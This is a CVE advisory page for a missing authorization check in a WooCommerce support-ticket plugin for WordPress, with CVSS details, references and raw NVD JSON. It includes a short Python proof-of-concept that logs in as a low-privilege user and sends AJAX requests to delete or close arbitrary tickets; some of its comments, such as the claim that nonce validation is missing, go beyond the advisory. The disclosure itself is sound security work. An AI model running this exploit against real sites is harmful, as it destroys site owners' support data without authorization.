Security Vulnerability Report
CVE-2025-14034 CVSS 5.3 MEDIUM

CVE-2025-14034

Published: 2026-01-06 04:15:53
Last Modified: 2026-04-15 00:35:42

Description

The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ilGhera Support System for WooCommerce <= 1.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14034 PoC - ilGhera Support System for WooCommerce Unauthorized Access
import requests

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "password"
TICKET_ID = 1  # Target ticket ID to delete/modify


def get_nonce(login_url, ajax_url):
    """Simulate getting authentication tokens"""
    session = requests.Session()
    # Login to WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': 1,
    }
    response = session.post(login_url, data=login_data)
    # Extract nonce for AJAX requests (simplified)
    nonce = session.cookies.get_dict().get('wordpress_test_cookie', '')
    return session, nonce


def delete_ticket(session, ticket_id):
    """Delete a ticket without proper authorization"""
    delete_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'delete_single_ticket',
        'ticket_id': ticket_id,
        'nonce': '',  # No proper nonce validation
    }
    response = session.post(delete_url, data=payload)
    return response


def change_ticket_status(session, ticket_id, new_status='closed'):
    """Change ticket status without proper authorization"""
    change_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'change_ticket_status',
        'ticket_id': ticket_id,
        'status': new_status,
        'nonce': '',  # No proper nonce validation
    }
    response = session.post(change_url, data=payload)
    return response


def main():
    login_url = f"{TARGET_URL}/wp-login.php"
    session, nonce = get_nonce(login_url, TARGET_URL)

    # Exploit: Delete arbitrary ticket
    print(f"[*] Deleting ticket ID: {TICKET_ID}")
    response = delete_ticket(session, TICKET_ID)
    print(f"[*] Response: {response.status_code}")

    # Exploit: Change ticket status
    print("[*] Changing ticket status to 'closed'")
    response = change_ticket_status(session, TICKET_ID, 'closed')
    print(f"[*] Response: {response.status_code}")


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L1331
https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L865
https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L1331
https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L865
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426161%40wc-support-system&new=3426161%40wc-support-system&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/e74fb552-3ef4-47cd-8fe6-8cc1e74b8377?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14034",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-06T04:15:53.057",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status."
      },
      {
        "lang": "es",
        "value": "El plugin ilGhera Support System para WooCommerce para WordPress es vulnerable a la modificación no autorizada y la pérdida de datos debido a una verificación de capacidad faltante en las funciones 'delete_single_ticket_callback' y 'change_ticket_status_callback' en todas las versiones hasta la 1.2.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, eliminen tickets de soporte arbitrarios y modifiquen su estado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L1331", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L865", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L1331", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L865", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426161%40wc-support-system&new=3426161%40wc-support-system&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e74fb552-3ef4-47cd-8fe6-8cc1e74b8377?source=cve", "source": "[email protected]"}
    ]
  }
}